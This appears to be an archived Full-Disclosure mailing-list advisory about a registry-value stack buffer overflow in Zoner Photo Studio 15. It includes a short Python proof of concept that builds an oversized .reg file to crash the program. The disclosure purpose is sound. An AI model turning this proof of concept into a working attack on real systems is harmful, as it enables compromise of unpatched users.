lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <509C3BAB.9020305@inshell.net>
Date: Fri, 09 Nov 2012 00:09:31 +0100
From: Inshell Security <info@...hell.net>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, 
	vuln@...unia.com, submissions@...ketstormsecurity.org, 
	moderators@...db.org
Subject: [IA42] Zoner Photo Studio v15 Build 3 (Zps.exe)
 Registry Value Parsing Local Buffer Overflow

Inshell Security Advisory
http://www.inshell.net


1. ADVISORY INFORMATION
-----------------------
Product:        Zoner Photo Studio
Vendor URL:     www.zoner.com
Type:           Stack-based Buffer Overflow [CWE-121]
Date found:     2012-10-17
Date published: 2012-11-09
CVSSv2 Score:   4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:            -


2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.


3. VERSIONS AFFECTED
--------------------
Zoner Photo Studio 15 Build 3
Zoner Photo Studio 15 Build 2, older versions may be affected too.


4. VULNERABILITY DESCRIPTION
----------------------------
A stack-based buffer overflow vulnerability has been identified in Zoner
Photo Studio 15 Build 2 and 3.

When launching, the application loads the "Issuer" value from the
registry key "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio
15\Preferences\Certificate]", but it does not validate the length of the
string loaded from the key before passing it to a buffer, which leads to
a stack-based buffer overflow.

An attacker needs to force the victim to import an arbitrary .reg file
to exploit this vulnerability.


5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python

file="poc.reg"

junk1="\x41" * 2140
boom="\x42\x42\x42\x42"
junk2="\x43" * 1000

poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio
15\Preferences\Certificate]\n"
poc=poc + "\"Issuer\"=\"" + junk1 + boom + junk2 + "\""

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";


For technical details, screenshots and/or PoCs visit:
http://security.inshell.net/advisory/42


6. SOLUTION
-----------
None


7. REPORT TIMELINE
------------------
2012-10-17: Initial notification sent to vendor about bug in Build 2
2012-10-18: Vendor Feedback / Response
2012-10-22: Short vendor statement about expected delay
2012-10-29: Notification about the disclosure date
2012-**-**: Vendor releases Build 3 which is still vulnerable
2012-11-09: No response
2012-11-09: Full Disclosure according to disclosure policy


8. REFERENCES
-------------
http://security.inshell.net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ